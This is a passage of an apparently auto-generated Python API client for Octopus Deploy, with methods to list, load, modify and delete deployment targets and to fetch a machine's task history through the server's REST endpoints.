"""custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_spaces # noqa: E501
Lists all of the registered machines in the supplied Octopus Deploy Space, from all environments. The results will be sorted alphabetically by name. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_spaces_with_http_info(base_space_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['base_space_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_spaces" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'base_space_id' is set
if ('base_space_id' not in params or
params['base_space_id'] is None):
raise ValueError("Missing the required parameter `base_space_id` when calling `custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_spaces`") # noqa: E501
collection_formats = {}
path_params = {}
if 'base_space_id' in params:
path_params['baseSpaceId'] = params['base_space_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/{baseSpaceId}/machines', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder(self, id, **kwargs): # noqa: E501
"""custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder # noqa: E501
Get the history of related tasks for a machine. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: ID of the machine (required)
:return: ResourceCollectionTaskResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_with_http_info(id, **kwargs) # noqa: E501
return data
def custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_with_http_info(self, id, **kwargs): # noqa: E501
"""custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder # noqa: E501
Get the history of related tasks for a machine. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: ID of the machine (required)
:return: ResourceCollectionTaskResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/machines/{id}/tasks', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResourceCollectionTaskResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_spaces(self, base_space_id, id, **kwargs): # noqa: E501
"""custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_spaces # noqa: E501
Get the history of related tasks for a machine. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_spaces(base_space_id, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:param str id: ID of the machine (required)
:return: ResourceCollectionTaskResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_spaces_with_http_info(base_space_id, id, **kwargs) # noqa: E501
else:
(data) = self.custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_spaces_with_http_info(base_space_id, id, **kwargs) # noqa: E501
return data
def custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_spaces_with_http_info(self, base_space_id, id, **kwargs): # noqa: E501
"""custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_spaces # noqa: E501
Get the history of related tasks for a machine. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_spaces_with_http_info(base_space_id, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:param str id: ID of the machine (required)
:return: ResourceCollectionTaskResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['base_space_id', 'id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_spaces" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'base_space_id' is set
if ('base_space_id' not in params or
params['base_space_id'] is None):
raise ValueError("Missing the required parameter `base_space_id` when calling `custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_spaces`") # noqa: E501
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_spaces`") # noqa: E501
collection_formats = {}
path_params = {}
if 'base_space_id' in params:
path_params['baseSpaceId'] = params['base_space_id'] # noqa: E501
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/{baseSpaceId}/machines/{id}/tasks', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResourceCollectionTaskResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource(self, id, **kwargs): # noqa: E501
"""Delete a DeploymentTargetResource by ID # noqa: E501
Deletes an existing machine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: ID of the DeploymentTargetResource to delete (required)
:return: TaskResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete a DeploymentTargetResource by ID # noqa: E501
Deletes an existing machine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: ID of the DeploymentTargetResource to delete (required)
:return: TaskResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/machines/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TaskResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces(self, base_space_id, id, **kwargs): # noqa: E501
"""Delete a DeploymentTargetResource by ID # noqa: E501
Deletes an existing machine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces(base_space_id, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:param str id: ID of the DeploymentTargetResource to delete (required)
:return: TaskResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, id, **kwargs) # noqa: E501
else:
(data) = self.delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, id, **kwargs) # noqa: E501
return data
def delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(self, base_space_id, id, **kwargs): # noqa: E501
"""Delete a DeploymentTargetResource by ID # noqa: E501
Deletes an existing machine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:param str id: ID of the DeploymentTargetResource to delete (required)
:return: TaskResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['base_space_id', 'id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'base_space_id' is set
if ('base_space_id' not in params or
params['base_space_id'] is None):
raise ValueError("Missing the required parameter `base_space_id` when calling `delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces`") # noqa: E501
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces`") # noqa: E501
collection_formats = {}
path_params = {}
if 'base_space_id' in params:
path_params['baseSpaceId'] = params['base_space_id'] # noqa: E501
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/{baseSpaceId}/machines/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TaskResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource(self, **kwargs): # noqa: E501
"""Get a list of DeploymentTargetResources # noqa: E501
Lists all of the deployment targets in the supplied Octopus Deploy Space. The results will be sorted alphabetically by name. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[DeploymentTargetResource]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(**kwargs) # noqa: E501
return data
def list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(self, **kwargs): # noqa: E501
"""Get a list of DeploymentTargetResources # noqa: E501
Lists all of the deployment targets in the supplied Octopus Deploy Space. The results will be sorted alphabetically by name. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[DeploymentTargetResource]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/machines/all', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[DeploymentTargetResource]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces(self, base_space_id, **kwargs): # noqa: E501
"""Get a list of DeploymentTargetResources # noqa: E501
Lists all of the deployment targets in the supplied Octopus Deploy Space. The results will be sorted alphabetically by name. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces(base_space_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:return: list[DeploymentTargetResource]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, **kwargs) # noqa: E501
else:
(data) = self.list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, **kwargs) # noqa: E501
return data
def list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(self, base_space_id, **kwargs): # noqa: E501
"""Get a list of DeploymentTargetResources # noqa: E501
Lists all of the deployment targets in the supplied Octopus Deploy Space. The results will be sorted alphabetically by name. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:return: list[DeploymentTargetResource]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['base_space_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'base_space_id' is set
if ('base_space_id' not in params or
params['base_space_id'] is None):
raise ValueError("Missing the required parameter `base_space_id` when calling `list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces`") # noqa: E501
collection_formats = {}
path_params = {}
if 'base_space_id' in params:
path_params['baseSpaceId'] = params['base_space_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/{baseSpaceId}/machines/all', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[DeploymentTargetResource]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource(self, id, **kwargs): # noqa: E501
"""Get a DeploymentTargetResource by ID # noqa: E501
Gets a single machine by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: ID of the DeploymentTargetResource to load (required)
:return: DeploymentTargetResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(id, **kwargs) # noqa: E501
return data
def load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(self, id, **kwargs): # noqa: E501
"""Get a DeploymentTargetResource by ID # noqa: E501
Gets a single machine by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: ID of the DeploymentTargetResource to load (required)
:return: DeploymentTargetResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/machines/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeploymentTargetResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces(self, base_space_id, id, **kwargs): # noqa: E501
"""Get a DeploymentTargetResource by ID # noqa: E501
Gets a single machine by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces(base_space_id, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:param str id: ID of the DeploymentTargetResource to load (required)
:return: DeploymentTargetResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, id, **kwargs) # noqa: E501
else:
(data) = self.load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, id, **kwargs) # noqa: E501
return data
def load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(self, base_space_id, id, **kwargs): # noqa: E501
"""Get a DeploymentTargetResource by ID # noqa: E501
Gets a single machine by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:param str id: ID of the DeploymentTargetResource to load (required)
:return: DeploymentTargetResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['base_space_id', 'id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'base_space_id' is set
if ('base_space_id' not in params or
params['base_space_id'] is None):
raise ValueError("Missing the required parameter `base_space_id` when calling `load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces`") # noqa: E501
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces`") # noqa: E501
collection_formats = {}
path_params = {}
if 'base_space_id' in params:
path_params['baseSpaceId'] = params['base_space_id'] # noqa: E501
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/{baseSpaceId}/machines/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeploymentTargetResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource(self, id, **kwargs): # noqa: E501
"""Modify a DeploymentTargetResource by ID # noqa: E501
Modifies an existing machine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: ID of the DeploymentTargetResource to modify (required)
:param DeploymentTargetResource deployment_target_resource: The DeploymentTargetResource resource to create
:return: DeploymentTargetResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(id, **kwargs) # noqa: E501
return data
def modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(self, id, **kwargs): # noqa: E501
"""Modify a DeploymentTargetResource by ID # noqa: E501
Modifies an existing machine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: ID of the DeploymentTargetResource to modify (required)
:param DeploymentTargetResource deployment_target_resource: The DeploymentTargetResource resource to create
:return: DeploymentTargetResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'deployment_target_resource'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'deployment_target_resource' in params:
body_params = params['deployment_target_resource']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/machines/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeploymentTargetResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces(self, base_space_id, id, **kwargs): # noqa: E501
"""Modify a DeploymentTargetResource by ID # noqa: E501
Modifies an existing machine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
